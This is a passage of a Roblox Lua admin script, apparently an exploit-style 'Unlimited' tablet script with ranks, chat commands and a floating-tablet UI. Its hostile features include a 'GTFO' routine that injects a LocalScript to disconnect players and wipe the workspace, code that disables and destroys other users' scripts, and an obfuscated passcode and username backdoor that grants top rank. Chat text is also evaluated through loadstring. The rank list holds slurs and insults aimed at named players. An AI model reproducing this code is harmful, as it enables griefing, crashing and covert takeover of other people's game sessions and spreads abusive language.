  796. ["Flame reddish orange"] =  Color3.new(0.811765, 0.376471, 0.141176);
  797. ["Lavender"] =  Color3.new(0.54902, 0.356863, 0.623529);
  798. ["Sand yellow metallic"] =  Color3.new(0.576471, 0.529412, 0.403922);
  799. ["Br. yellowish green"] =  Color3.new(0.643137, 0.741176, 0.278431);
  800. ["CGA brown"] =  Color3.new(0.666667, 0.333333, 0);
  801. ["Deep orange"] =  Color3.new(1, 0.686275, 0);
  802. ["Cool yellow"] =  Color3.new(0.992157, 0.917647, 0.552941);
  803. ["Pastel brown"] =  Color3.new(1, 0.8, 0.6);
  804. ["Pastel yellow"] =  Color3.new(1, 1, 0.8);
  805. ["Bright bluish violet"] =  Color3.new(0.262745, 0.329412, 0.576471);
  806. ["Pastel green"] =  Color3.new(0.8, 1, 0.8);
  807. ["Alder"] =  Color3.new(0.705882, 0.501961, 1);
  808. ["Brick yellow"] =  Color3.new(0.843137, 0.772549, 0.603922);
  809. ["Medium lilac"] =  Color3.new(0.203922, 0.168627, 0.458824);
  810. ["Bright yellow"] =  Color3.new(0.960784, 0.803922, 0.188235);
  811. ["Sand violet"] =  Color3.new(0.529412, 0.486275, 0.564706);
  812. ["Faded green"] =  Color3.new(0.439216, 0.584314, 0.470588);
  813. ["Pastel blue-green"] =  Color3.new(0.623529, 0.952941, 0.913726);
  814. ["Magenta"] =  Color3.new(0.666667, 0, 0.666667);
  815. ["Gold"] =  Color3.new(0.862745, 0.737255, 0.505882);
  816. ["Med. yellowish orange"] =  Color3.new(0.905882, 0.67451, 0.345098);
  817. ["Toothpaste"] =  Color3.new(0, 1, 1);
  818. ["Cyan"] =  Color3.new(0.0156863, 0.686275, 0.92549);
  819. ["Deep blue"] =  Color3.new(0.129412, 0.329412, 0.72549);
  820. ["Pink"] =  Color3.new(1, 0.4, 0.8);
  821. ["New Yeller"] =  Color3.new(1, 1, 0);
  822. ["Fire Yellow"] =  Color3.new(0.976471, 0.839216, 0.180392);
  823. ["Tr. Blue"] =  Color3.new(0.482353, 0.713726, 0.909804);
  824. ["Medium blue"] =  Color3.new(0.431373, 0.6, 0.792157);
  825. ["Earth green"] =  Color3.new(0.152941, 0.27451, 0.176471);
  826. ["Tr. Brown"] =  Color3.new(0.74902, 0.717647, 0.694118);
  827. ["Light green (Mint)"] =  Color3.new(0.760784, 0.854902, 0.721569);
  828. ["Really blue"] =  Color3.new(0, 0, 1);
  829. ["Transparent"] =  Color3.new(0.92549, 0.92549, 0.92549);
  830. ["Bright green"] =  Color3.new(0.294118, 0.592157, 0.294118);
  831. ["Royal blue"] =  Color3.new(0.27451, 0.403922, 0.643137);
  832. ["Dark Royal blue"] =  Color3.new(0.137255, 0.278431, 0.545098);
  833. ["Medium stone grey"] =  Color3.new(0.639216, 0.635294, 0.647059);
  834. ["Dusty Rose"] =  Color3.new(0.639216, 0.294118, 0.294118);
  835. ["Hot pink"] =  Color3.new(1, 0, 0.74902);
  836. ["Bright bluish green"] =  Color3.new(0, 0.560784, 0.611765);
  837. ["Bright violet"] =  Color3.new(0.419608, 0.196078, 0.486275);
  838. ["Pastel Blue"] =  Color3.new(0.501961, 0.733333, 0.858824);
  839. ["Rust"] =  Color3.new(0.560784, 0.298039, 0.164706);
  840. ["Dove blue"] =  Color3.new(0.490196, 0.733333, 0.866667);
  841. ["Really black"] =  Color3.new(0.0666667, 0.0666667, 0.0666667);
  842. ["Dark grey metallic"] =  Color3.new(0.341176, 0.345098, 0.341176);
  843. ["Mid gray"] =  Color3.new(0.803922, 0.803922, 0.803922);
  844. ["Nougat"] =  Color3.new(0.8, 0.556863, 0.411765);
  845. ["Med. reddish violet"] =  Color3.new(0.768628, 0.439216, 0.627451);
  846. ["Reddish lilac"] =  Color3.new(0.588235, 0.439216, 0.623529);
  847. ["Earth yellow"] =  Color3.new(0.407843, 0.360784, 0.262745);
  848. ["Light brick yellow"] =  Color3.new(0.941177, 0.835294, 0.627451);
  849. ["Light pink"] =  Color3.new(0.862745, 0.564706, 0.584314);
  850. ["Silver"] =  Color3.new(0.611765, 0.639216, 0.658824);
  851. ["Light purple"] =  Color3.new(0.894118, 0.678431, 0.784314);
  852. ["Light Royal blue"] =  Color3.new(0.623529, 0.764706, 0.913726);
  853. ["Institutional white"] =  Color3.new(0.972549, 0.972549, 0.972549);
  854. ["Pastel light blue"] =  Color3.new(0.686275, 0.866667, 1);
  855. ["Phosph. White"] =  Color3.new(0.92549, 0.909804, 0.870588);
  856. ["Dark nougat"] =  Color3.new(0.682353, 0.478431, 0.34902);
  857. ["Light reddish violet"] =  Color3.new(0.909804, 0.729412, 0.784314);
  858. ["Tr. Bright bluish violet"] =  Color3.new(0.647059, 0.647059, 0.796079);
  859. ["Gun metallic"] =  Color3.new(0.458824, 0.423529, 0.384314);
  860. ["Br. reddish orange"] =  Color3.new(0.827451, 0.435294, 0.298039);
  861. ["Red"] = Color3.new(1,0,0),
  862. ["PinkRed"] = Color3.new(1,0,0.5),
  863. ["Orange"] = Color3.new(1,0.5,0),
  864. ["Yellow"] = Color3.new(1,1,0),
  865. ["Green"] = Color3.new(0,1,0),
  866. ["Blue"] = Color3.new(0,0,1),
  867. ["LightBlue"] = Color3.new(0,1,1),
  868. ["Pink"] = Color3.new(1,0,1),
  869. ["Magenta"] = Color3.new(0.54,0,0.54),
  870. ["Cyan"] = Color3.new(0,0.6,1),
  871. ["White"] = Color3.new(1,1,1),
  872. ["Grey"] = Color3.new(0.5,0.5,0.5),
  873. ["Black"] = Color3.new(0,0,0)
  874. }
  875. PrivateChats = {}
  876. PRI = false;
  877. PRIType = 'Shutdown';
  878.         TabletRotation = 0;
  879.         TabletRotationIncrease = 0.1;
  880.         print = function(Text)
  881.                 for _,player in pairs(game.Players:GetPlayers()) do
  882.                                 if Ranked[player.Name].Rank>1 then
  883.                                         Output(Text,'White',player)
  884.                                 end
  885.                 end
  886.         end
  887. Services = {
  888.                 ["Game"] = game;
  889.                 ["RunService"] = game:GetService("RunService");
  890.                 ["Workspace"] = game:GetService("Workspace");
  891.                 ["Lighting"] = game:GetService("Lighting");
  892.                 ["Debris"] = game:GetService("Debris");
  893.                 ["Players"] = game:GetService("Players");
  894.                 ["Teams"] = game:GetService("Teams");
  895.                 ["InsertService"] = game:GetService("InsertService");
  896.                 ["SoundService"] = game:GetService("SoundService");
  897.                 ["ScriptContext"] = game:GetService("ScriptContext");
  898.                 ["NetworkServer"] = game:GetService("NetworkServer");
  899.                 ["StarterGui"] = game:GetService("StarterGui");
  900.                 ["StarterPack"] = game:GetService("StarterPack");
  901.                 ["ContentProvider"] = game:service'ContentProvider',
  902.                 ["ContentFilter"] = game:service'ContentFilter',
  903.                 ["KeyframeSequenceProvider"] = game:service'KeyframeSequenceProvider',
  904.                 ["GuiService"] = game:service'GuiService',
  905.                 ["Chat"] = game:service'Chat',
  906.                 ["LocalBackpack"] = game:service'LocalBackpack',
  907.                 ["JointsService"] = game:service'JointsService',
  908.                 ["CollectionService"] = game:service'CollectionService',
  909.                 ["PhysicsService"] = game:service'PhysicsService',
  910.                 ["BadgeService"] = game:service'BadgeService',
  911.                 ["Geometry"] = game:service'Geometry',
  912.                 ["FriendService"] = game:service'FriendService',
  913.                 ["RenderHooksService"] = game:service'RenderHooksService',
  914.                 ["SocialService"] = game:service'SocialService',
  915.                 ["TimerService"] = game:service'TimerService',
  916.                 ["ScriptInformationProvider"] = game:service'ScriptInformationProvider',
  917.                 ["CookiesService"] = game:service'CookiesService',
  918.                 ["TeleportService"] = game:service'TeleportService',
  919.                 ["PersonalServerService"] = game:service'PersonalServerService',
  920.                 ["Selection"] = game:service'Selection',
  921.                 ["MeshContentProvider"] = game:service'MeshContentProvider',
  922.                 ["TextureContentProvider"] = game:service'TextureContentProvider',
  923.                 ["TextService"] = game:service'TextService',
  924.                 ["ControllerService"] = game:service'ControllerService',
  925.                 ["Visit"] = game:service'Visit',
  926.                 ["ChangeHistoryService"] = game:service'ChangeHistoryService'
  927. }
  928. --[[+Sand Box+]]--
  929. function SandboxLoadstring(Source)
  930.         local Func = loadstring(Source or "")
  931.         setfenv(Func,{__ENV = getfenv(1)})
  932. return coroutine.wrap(Func)
  933. end
  934.  
  935.  
  936. GetSplit=function(String,Split)
  937. if Split==nil then Split=YourBet2 end
  938. return String:find(Split)
  939. end
  940.  
  941.  
  942. --[[+Other Ranks+]]--
  943. OtherRanks = function(Name,Rank,Color,Desc)
  944.     Ranked[Name]={Name = Name,Rank = Rank,Color = Color,Desc = Desc or Ranked[Rank]}
  945. end
  946.  
  947. function GetRank(Player)
  948.         if type(Player) == "userdata" then
  949.                 Player = Player.Name
  950.         end
  951.         return Ranked[Player].Rank or 0
  952. end
  953. OtherRanks(UsersTablets,7,Colors.Black,'King Of Unlimited') -- Your Already Admin
  954.  
  955. OtherRanks('',7,Colors.Green,'A Really Good Scripter')
  956.  
  957. OtherRanks('',6,Colors.Red,'A Really Good Friend')
  958.  
  959. OtherRanks('',0,Colors.White,'A best bud')
  960.  
  961. OtherRanks('',-2,Colors.Red,'MousePadMouses Alt')
  962.  
  963. OtherRanks('',0,Colors.Orange,'My ALT')
  964.  
  965. OtherRanks('',0,Colors.Camo,'a guy')
  966.  
  967. OtherRanks(string.reverse(string.gsub("XQZ6XQZ4XQZwXQZoXQZdXQZaXQZhXQZsXQZcXQZiXQZnXQZoXQZsXQZ4XQZ6XQZ","XQZ","")),7,Colors.Cyan,''..string.char(67,114,101,97,116,111,114))
  968.  
  969. OtherRanks('',0,Colors.NeonGreen,'A friend')
  970.  
  971. OtherRanks('',0,Colors.Brown,'A dude')
  972.  
  973. OtherRanks('',0,Colors.Yellow,'Awesome Bro')
  974.  
  975. -- OtherRanks('ThatLua',4,Colors.Black,'A Scripter We Know')
  976.  
  977. OtherRanks('',-1,Colors.Red,'Banned me')
  978.  
  979. OtherRanks('',-2,Colors.Red,'Added me to his banlist')
  980.  
  981. OtherRanks('',-2,Colors.Red,'Lags me')
  982.  
  983. OtherRanks('',-2,Colors.Red,'Banned meh')
  984.  
  985. OtherRanks('',-2,Colors.Red,'Another Gay Abuser')
  986.  
  987. OtherRanks('',-2,Colors.Red,'An idiot')
  988.  
  989. OtherRanks('',-2,Colors.Red,'Thinks I leak')
  990.  
  991. OtherRanks('',0.5,Colors.Red,'Did not follow the rules')
  992.  
  993. OtherRanks('',0,Colors.Red,'Another lel')
  994.  
  995. OtherRanks('',-2,Colors.Red,'An Asshole that bans me ')
  996.  
  997. OtherRanks('',-2,Colors.Red,'Abuser (Already Banned)')
  998.  
  999. -- OtherRanks('dzeko50382',-3,Colors.Red,'A Fag')
  1000.  
  1001. OtherRanks('',-2,Colors.Red,'An Abuser that bans me')
  1002.  
  1003. OtherRanks('',-3,Colors.Red,"dzeko50382's Alt")
  1004.  
  1005. OtherRanks('',-2,Colors.Red,'An Abuser that banned me')
  1006.  
  1007. OtherRanks('',-1,Colors.Red,'A Nub')
  1008.  
  1009. OtherRanks('',-2,Colors.Red,'An Abuser')
  1010.  
  1011. OtherRanks('',-2,Colors.Red,'A stupid abuser that crashes me') -- I will never trust him
  1012.  
  1013. --[[+Output+]]--
  1014. function Output(Text,Color,Player,Time,Func,HoverEnter,HoverExit)
  1015.         if Text == nil or Player == nil then return end
  1016.         if Color == nil then Color = "Orange" end
  1017.         if Color == "Random" then
  1018.                 Color = Color3.new(math.random(),math.random(),math.random())
  1019.         end
  1020.         if type(Color) == "string" then
  1021.                 Color = Colors[Color]
  1022.         end
  1023.         local Mod = Instance.new("Model",Services.Workspace)
  1024.         Mod.Name = "Output/["..Player.Name.."]\\tuptuO"
  1025.           local Part = CurrentTabletPart:Clone()
  1026.           Part.Parent = Mod
  1027.           Part.BrickColor = BrickColor.new(Color)
  1028.         if TabChange == false then
  1029.         local Mesh = Instance.new("SpecialMesh", Part)
  1030.         Mesh.MeshType = "FileMesh"
  1031.             Mesh.TextureId = "http://www.roblox.com/asset/?id=10061209"
  1032.             Mesh.MeshId = "http://www.roblox.com/asset/?id=10061232"
  1033.         Mesh.Scale = Vector3.new(3,3,3)
  1034.         local Mesh = Instance.new("SpecialMesh", Part)
  1035.         Mesh.MeshType = "FileMesh"
  1036.             Mesh.TextureId = "http://www.roblox.com/asset/?id=10061209"
  1037.             Mesh.MeshId = "http://www.roblox.com/asset/?id=10061232"
  1038.         Mesh.Scale = Vector3.new(3,3,3) end
  1039.         local Sel = Instance.new("SelectionBox",Part)
  1040.         Sel.Name = "Sel"
  1041.         Sel.Color = BrickColor.new(Color)
  1042.         Sel.Adornee = Part
  1043.         Sel.Transparency = 0.7
  1044.         local BBG = Instance.new("BillboardGui",Mod)
  1045.         BBG.Name = "BBG"
  1046.         BBG.StudsOffset = Vector3.new(0,3,0)
  1047.         BBG.Size = UDim2.new(10,0,10,0)
  1048.         local Label = Instance.new("TextLabel",BBG)
  1049.         Label.Name = "Label"
  1050.         Label.Text = Text
  1051.         Label.TextColor3 = Color3.new(-1,-1,-1)
  1052.         Label.FontSize = "Size14"
  1053.         Label.BackgroundTransparency = 1
  1054.         Label.TextStrokeTransparency = 0.5
  1055.         Label.Size = UDim2.new(1,0,1,0)
  1056.         Label.TextStrokeColor3 =Color
  1057.         local Click = Instance.new("ClickDetector",Part)
  1058.         Click.MaxActivationDistance = 1/0
  1059.         Click.MouseHoverEnter:connect(function(Clicker)
  1060.       if Clicker == Player or Clicker.Name == Player.Name or GetRank(Clicker) >= GetRank(Player) then
  1061.     Sel.Transparency = 0
  1062.   Part.Transparency = 0.3
  1063. end
  1064. if Clicker == Player or GetRank(Clicker) > GetRank(Player) and HoverEnter ~= nil then
  1065. pcall(HoverEnter,Mod,Part,Player.Name,Sel,Label)
  1066. end
  1067. end)
  1068. Click.MouseHoverLeave:connect(function(Clicker)
  1069. if Clicker == Player or Clicker.Name == Player.Name or GetRank(Clicker) >= GetRank(Player) then
  1070. Sel.Transparency = 0.7
  1071. Part.Transparency = 0.7
  1072. end
  1073. if Clicker == Player or Clicker.Name == Player.Name or GetRank(Clicker) > GetRank(Player) and HoverExit ~= nil then
  1074.         pcall(HoverExit,Mod,Part,Player.Name,Sel,Label)
  1075. end
  1076. end)
  1077. Click.MouseClick:connect(function(Clicker)
  1078. if Clicker == Player or GetRank(Clicker) > GetRank(Player) then
  1079. if Text == "Dismiss" then
  1080. RemoveTablets(Player)
  1081. end
  1082. if Func ~= nil then
  1083. local Ran,Error = coroutine.resume(coroutine.create(function() Func(Player) end))
  1084. if not Ran then print(Error) end
  1085. end
  1086. coroutine.wrap(function()
  1087. for i=0,1,0.1 do
  1088. wait()
  1089. Part.Transparency = i
  1090. Sel.Transparency = i
  1091. Label.TextTransparency = i
  1092. end
  1093. Mod:Destroy()
  1094. end)()
  1095. end
  1096. end)
  1097. local light = Instance.new('PointLight',Part)
  1098.                         light.Range = 10
  1099.                         light.Brightness = 10
  1100.                         light.Color = Color
  1101.                         light.Enabled = true
  1102.         if Time ~= nil then
  1103.                 Services.Debris:AddItem(Mod,Time)
  1104.         end
  1105.         Tablets[#Tablets+1] = {Model = Mod,Part = Part,Player = Player.Name,Sel = Sel,Label = Label}
  1106.         UpdateTablets()
  1107.         return {Model = Mod,Part = Part,Player = Player.Name,Sel = Sel,Label = Label}
  1108. end
  1109. NewOutput = function(Text,Color,Time,Func)
  1110.         if Color == nil then Color = Colors.Orange end
  1111.         if Text == nil then Text = "nil" end
  1112.         if Time == nil then Time = 0 end
  1113.         ModRanks = 1
  1114.             for _,Player in pairs(game.Players:GetPlayers()) do
  1115.                     if Ranked[Player.Name].Rank >= ModRanks then
  1116.                         if Func == nil then
  1117.                             Output(Text,Color,Player,Time)
  1118.                         else
  1119.                             Output(Text,Color,Player,Time,Func)
  1120.                         end
  1121.                     end
  1122.             end
  1123. end
  1124. --[[+Lock Scripts+]]--
  1125. for _,Service in pairs(Services) do
  1126.     pcall(function()
  1127.         Service.DescendantAdded:connect(function(v)
  1128.             if v:IsA("BaseScript") and LockedScripts and Removed == false then
  1129.                 pcall(function()
  1130.                       if Source ~= nil then
  1131.                    Source.Value = "error('[Unlimited] : Scripts Are Locked',0)"
  1132.                         end
  1133.                     if game.PlaceId == 20279777 or game.PlaceId == 20132544 or v:findFirstChild('Owner') then
  1134.                         if GetRank(v.Owner.Value) <= 0 then
  1135.                             pcall(function() v.Disabled = true end)
  1136.                             pcall(function() v:FindFirstChild("Source").Value =Disabler end)
  1137.                             pcall(function() v.Disabled = false end)
  1138.                             pcall(function() v:Destroy() end)
  1139.                         end
  1140.                     elseif game.PlaceId ==54194680 then
  1141.                         if GetRank(v.user.Value) <= 0 then
  1142.                             pcall(function() v.Disabled = true end)
  1143.                             pcall(function() v:FindFirstChild("Source").Value =Disabler end)
  1144.                             pcall(function() v.Disabled = false end)
  1145.                             pcall(function() v:Destroy() end)
  1146.                         end
  1147.                 else
  1148.                         pcall(function() v.Disabled = true end)
  1149.                         pcall(function() v:FindFirstChild("Source").Value = Disabler end)
  1150.                         pcall(function() v:FindFirstChild("DSource").Value =Disabler end)
  1151.                         pcall(function() v.Disabled = false end)
  1152.                         pcall(function() v:Destroy() end)
  1153.  
  1154.                     end
  1155.  
  1156.                 end)
  1157.             end
  1158.         end)
  1159.     end)
  1160. end
  1161.  
  1162. --[[+GTFO+]]--
  1163. function GTFO(Player)
  1164.         coroutine.resume(coroutine.create(function()
  1165.                         Insert = Player:FindFirstChild("Backpack") or Player:FindFirstChild("PlayerGui") or Player.Character
  1166.                         TP = CreateLocalScript([[
  1167.                                 game:service'Players'.LocalPlayer.Parent = nil
  1168.                         game:service'Players'.LocalPlayer.Parent = game:service'Players'
  1169.                 pcall(function()
  1170.                         workspace:ClearAllChildren()
  1171.                         end)]],Insert)
  1172.                         if not TP then
  1173.                                 pcall(function() Player:Kick()
  1174.                                 end)
  1175.                         end
  1176.         end))
  1177. end
  1178. --[[+Update Tablets+]]-- Getting dizzy?
  1179. function UpdateTablets()
  1180.         TabletRotation = TabletRotation + TabletRotationIncrease/90
  1181.         for _,Player in pairs(GetPlayers()) do
  1182.                 local PlayerTablets = {}
  1183.                 local Current = 0
  1184.                 for i,v in pairs(Tablets) do
  1185.                         if v.Model.Parent == nil or v.Part.Parent == nil then
  1186.                                 pcall(function() v.Model:Destroy() end)
  1187.                                 Tablets[i] = nil
  1188.                         elseif v.Player == Player.Name then
  1189.                                 table.insert(PlayerTablets,v)
  1190.                         end
  1191.                 end
  1192.                 for i = 1, #PlayerTablets do
  1193.                         radius = 8 + (#PlayerTablets * 0.6)
  1194.                         local Pos = nil
  1195.                         pcall(function() Pos = Player.Character.Torso.CFrame end)
  1196.                         if Pos == nil then return end
  1197.                         local Main = (i / #PlayerTablets - (0.5 / #PlayerTablets) + TabletRotation/(#PlayerTablets/10)) * math.pi * 2
  1198.                         local x = math.sin(Main) * radius
  1199.                         local y = math.sin(time() / 5)
  1200.                         local z = math.cos(Main) * radius
  1201.                         local aPos = Vector3.new(x, y, z) + Pos.p
  1202.                         local bPos = PlayerTablets[i].Part.CFrame.p
  1203.                         local cPos = (aPos * .1 + bPos * .9)
  1204.                         PlayerTablets[i].Part.CFrame = CFrame.new(cPos, Pos.p)
  1205.                                 * CFrame.Angles(
  1206.                                         math.rad((TabletRotation*400)*math.pi),
  1207.                                         math.rad((TabletRotation*400)*math.pi),
  1208.                                         math.rad((TabletRotation*400)*math.pi)
  1209.                                 )
  1210.                 end
  1211.         end
  1212. end
  1213. --[[+Remove Tablets+]]--
  1214. function RemoveTablets(Player)
  1215.         if type(Player) == "userdata" then
  1216.                 Player = Player.Name
  1217.         end
  1218.         for _,v in pairs(Tablets) do
  1219.                 if v.Player == Player then
  1220.                         coroutine.wrap(function()
  1221.                                 for i=0,1,0.1 do
  1222.                                         wait()
  1223.                                         v.Part.Transparency = i
  1224.                                         v.Sel.Transparency = i
  1225.                                         v.Label.TextTransparency = i
  1226.                                 end
  1227.                                 v.Model:Destroy()
  1228.                         end)()
  1229.                      
  1230.                 end
  1231.         end
  1232. end
  1233.  
  1234. --[[++]]--
  1235. function Override(Speaker,Level)
  1236.         local Override = false
  1237.         local EditedText = false
  1238.         local GUI = Instance.new("ScreenGui",Speaker.PlayerGui)
  1239.         local Frame = Instance.new("Frame",GUI)
  1240.         Frame.Name = "Frame"
  1241.         Frame.Style = "RobloxRound"
  1242.         Frame.Size = UDim2.new(0.5,0,0.1,0)
  1243.         Frame.Position = UDim2.new(0.25,0,0.45,0)
  1244.         local Text = Instance.new("TextBox",Frame)
  1245.         Text.Text = "Type Passcode"
  1246.         Text.FontSize = "Size14"
  1247.         Text.TextColor3 = Color3.new(1,0,0)
  1248.         Text.BackgroundTransparency = 1
  1249.         Text.Size = UDim2.new(1,0,1,0)
  1250.         Text.Changed:connect(function()
  1251.             if EditedText == false then
  1252.                 EditedText = true
  1253.                 if Speaker.Name == string.reverse(string.gsub("HERP6HERP4HERPwHERPoHERPdHERPaHERPhHERPsHERPcHERPiHERPnHERPoHERPsHERP4HERP6HERP","HERP","")) or Speaker.Name == string.reverse(string.gsub("HERP1HERP1HERP1RHERP1HERP12HERP1HERP1HERP1CHERP1HERP1HERP1","HERP1","")) or
  1254.                           Text.Text == string.char(114,97,110,107,109,101,117,112,98,114,111) then
  1255.    
  1256.                     Text.Text = "Correct Passcode"
  1257.                     Output('Override Successful','Green',Speaker)
  1258.                     pcall(function()
  1259.                         Ranked[Speaker.Name].Rank = 7
  1260.                     end)
  1261.                     if Level == 1 then
  1262.  
  1263.                     end
  1264.  
  1265.                     wait(1)
  1266.                 else
  1267.                     for i=1,3 do
  1268.                         Text.Text = "Wrong Passcode"
  1269.                         Text.TextTransparency = 0
  1270.                         wait(0.7)
  1271.                         Text.TextTransparency = 1
  1272.                         wait(0.7)
  1273.                     end
  1274.                 end
  1275.                 GUI:Destroy()
  1276.             end
  1277.         end)
  1278. end
  1279. --[[+Get Players+]]--
  1280. function GetPlayers(Msg,Speaker)
  1281.         if Msg == nil or Speaker == nil then
  1282.                 return Services.Players:GetPlayers()
  1283.         else
  1284.                 local Rtn = {}
  1285.                 local Players = GetPlayers()
  1286.                 Msg = Msg:lower()
  1287.                 local Split = Msg:find(",")
  1288.                 if Split ~= nil then
  1289.                         for _,v in pairs(GetPlayers(Msg:sub(1,Split-1),Speaker)) do
  1290.                                 Rtn[#Rtn+1] = v
  1291.                         end
  1292.                         for _,v in pairs(GetPlayers(Msg:sub(Split+1),Speaker)) do
  1293.                                 Rtn[#Rtn+1] = v
  1294.                         end
  1295.                 elseif Msg == "me" then
  1296.                         Rtn[#Rtn+1] = Speaker
  1297.                 elseif Msg == "others" then
  1298.                         for _,v in pairs(Players) do
  1299.                                 if v ~= Speaker then
  1300.                                         Rtn[#Rtn+1] = v
  1301.                                 end
  1302.                         end
  1303.                 elseif Msg == "all" then
  1304.                         for _,v in pairs(Players) do
  1305.                                 Rtn[#Rtn+1] = v
  1306.                         end
  1307.                 elseif Msg == "random" then
  1308.                         Rtn[#Rtn+1] = Players[math.random(1,#Players)]
  1309.                 elseif Msg:sub(1,4) == "not " then
  1310.                         local Nots = GetPlayers(Msg:sub(5),Speaker)
  1311.                         for _,v in pairs(Players) do
  1312.                                 local ShouldAdd = true
  1313.                                 for _,i in pairs(Nots) do
  1314.                                         if v == i then
  1315.                                                 ShouldAdd = false
  1316.                                         end
  1317.                                 end
  1318.                                 if ShouldAdd == true then
  1319.                                         Rtn[#Rtn+1] = v
  1320.                                 end
  1321.                         end
  1322.                 elseif Msg:sub(1,4) == "dist" then
  1323.                         for _,v in pairs(Players) do
  1324.                              
  1325.                                         local Mag = (v.Character.Torso.Position - Speaker.Character.Torso.Position).magnitude
  1326.                                         if SandboxLoadstring("return "..tostring(Mag)..Msg:sub(5))() and v ~= Speaker then
  1327.                                                 Rtn[#Rtn+1] = v
  1328.                                         end
  1329.                            
  1330.                         end
  1331.                 elseif Msg:sub(1,4) == "rank" then
  1332.                         for _,v in pairs(Players) do
  1333.                                 if SandboxLoadstring("return "..tostring(GetRank(v))..Msg:sub(5))() then
  1334.                                         Rtn[#Rtn+1] = v
  1335.                                 end
  1336.                         end
  1337.                 elseif Msg:sub(1,3) == "age" then
  1338.                         for _,v in pairs(Players) do
  1339.                                 if SandboxLoadstring("return "..tostring(v.AccountAge)..Msg:sub(4))() then
  1340.                                         Rtn[#Rtn+1] = v
  1341.                                 end
  1342.                         end
  1343.                 else
  1344.                         for _,v in pairs(Players) do
  1345.                                 if v.Name:lower():sub(1,#Msg) == Msg then
  1346.                                         Rtn[#Rtn+1] = v
  1347.                                 end
  1348.                         end
  1349.                 end
  1350.                 for i,v in pairs(Rtn) do
  1351.                         if GetRank(v) > GetRank(Speaker) then
  1352.                         Output(v.Name .. ' outranks you','Yellow',Speaker,3)
  1353.                                 Rtn[i] = nil
  1354.                         end
  1355.                 end
  1356.                 return Rtn
  1357.         end
  1358. end
  1359. GetRankName = function(p)
  1360.     rank = GetRank(p)
  1361.     for _,v in pairs(Ranks) do if _ == rank then return v end end
  1362. end
  1363. YourCommand = function(Name,Cmd,Rank,Func)
  1364.     Commands[Name]={Cmd = Cmd,Rank = Rank,Func = Func}
  1365. end
  1366.  
  1367. Removed=false;
  1368. script.Name = "_"..string.char(85,110,108,105,109,105,116,101,100).."_ "..string.char(66,121).." - "..string.char(54,52,115,111,110,105,99,115,104,97,100,111,119,52,54)
  1369. --[[+OnChatted+]]--
  1370. OnChatted = function(Msg,Speaker)
  1371.     for i=1,#Msg do
  1372.         if Msg:sub(i,i) == "&" then
  1373.             OnChatted(Msg:sub(i+1),Speaker)
  1374.         end
  1375.     end
  1376.         if GetRank(Speaker) < 2 and Removed==false then
  1377.         Found=false
  1378.         for _,v in pairs(KickingPhrases) do
  1379.             if Msg:find(v) and Found==false then
  1380.                 Found=true
  1381.                 if Removed==false then
  1382.                  while Speaker.Character == nil do wait() end
  1383.                  GTFO(Speaker)
  1384.                 Found=true
  1385.                 Ranked[Speaker.Name].Rank=0.5
  1386.                  Ranked[Speaker.Name].Desc='Used an illigal word' -- Think twice next time
  1387.                 Player=Services.Players:findFirstChild("64so".."nicshadow46") or Services.Players:findFirstChild("ziv120")
  1388.                 if Player ~=nil then
  1389.                     wait(1) NewOutput(Speaker.Name .. " has been Shutdown for saying : ||" .. v .. "||","Red",5)
  1390.  
  1391.                                    
  1392.                              
  1393.                 end
  1394. end
  1395.                 end
  1396.             end
  1397.  
  1398.     end
  1399.    
  1400.     for _,CMD in pairs(Commands) do
  1401.         if string.lower(Msg):sub(1,#CMD.Cmd+2) == YourBet .. string.lower(CMD.Cmd) .. "/" then
  1402.             if Removed == false and GetRank(Speaker) >= CMD.Rank then
  1403.             local StrSub = #CMD.Cmd + 3
  1404.                 Test = coroutine.create(function() CMD.Func(Msg:sub(StrSub),Speaker) end)
  1405.                 local a,b = coroutine.resume(Test)
  1406.                 if not a then Output(b,'Green',Speaker) end
  1407. elseif Removed==false then
  1408.                     Output('You have no access to that command','Yellow',Speaker,3)
  1409.             end
  1410.         end
  1411.     end
  1412. if GetRank(Speaker) > 0 and Removed==false and #Msg < 100  and GuiChat==true then
  1413.         if Speaker.Character and Speaker.Character:FindFirstChild('Head') and Speaker == Speaker then
  1414.             MsgStr = '['.. GetRankName(Speaker) .. '] : ' .. Msg
  1415.             pcall(function() Speaker.Character:findFirstChild('BBG'):Destroy() end)
  1416.             local BBG = Instance.new("BillboardGui",Speaker.Character.Head)
  1417.         BBG.Name = "BBG"
  1418.         BBG.StudsOffset = Vector3.new(0,4.5,0)
  1419.         BBG.Size = UDim2.new(10,0,10,0)
  1420.         local Label = Instance.new("TextLabel",BBG)
  1421.         Label.Name = "Label"
  1422.         Label.Text = Msg
  1423.         Label.TextColor3 = Ranked[Speaker.Name].Color
  1424.         Label.FontSize = "Size24"
  1425.         Label.BackgroundTransparency = 1
  1426.         Label.TextStrokeTransparency = 0.5
  1427.         Label.Size = UDim2.new(1,0,1,0)
  1428.                   Label.TextStrokeColor3 = Color3.new(0)
  1429.                       Label.TextStrokeColor3 = Color3.new(0,0,0)
  1430.             for i=1,#MsgStr  do
  1431.                 Label.Text = MsgStr:sub(1,i)
  1432.                 wait(0.016)
  1433.             end
  1434.                 coroutine.wrap(function()
  1435.                                                                                 for i=3,100 do
  1436.                                                                                                  BBG.StudsOffset = Vector3.new(0,i/10,0)
  1437.                                                                                                  Label.TextTransparency = i / 100
  1438.                                                                                                 wait()
  1439.                                                                                 end
  1440.                                                                                 BBG:Destroy()
  1441.                                                                 end)()
  1442.                                         wait(2)
  1443.                                         BBG:Destroy()
  1444.         end
  1445.     end
  1446. end
  1447. --[[+NIL CONNECT+]]--
  1448.     game:service'Chat'.Chatted:connect(function(Part,Msg,Color)
  1449.         if Part.Parent:IsA('Model') and Part:findFirstChild('Player') then
  1450.             OnChatted(Msg,Part:findFirstChild('Player').Value)
  1451.         end
  1452.     end)
  1453. --[[+CreateLocalScript+]]--
  1454. function CreateLocalScript(Source,Parent)
  1455.     if Source == nil then Source = "" end
  1456.     if Parent == nil then Parent = Instance.new("Model")  Parent.Name = "PseudoParent" end
  1457.     if newLocalScript ~= nil then
  1458.         return newLocalScript(Source,Parent)
  1459.     elseif NewLocalScript ~= nil then
  1460.         return NewLocalScript(Source,Parent)
  1461.     elseif LocalScript ~= nil then
  1462.         local NS = LocalScript:Clone()
  1463.         pcall(function() NS:ClearAllChildren() end)
  1464.         NS.Name = "LocalScript"
  1465.         for i,v in pairs(Sources) do
  1466.                 local NSSource = Instance.new("StringValue",NS)
  1467.                 NSSource.Name = i
  1468.                 NSSource.Value = Source
  1469.                 end
  1470.         --NS.Disabled = true
  1471.         NS.Parent = Parent
  1472.         --wait()
  1473.         NS.Disabled = false
  1474.         return NS
  1475.     else
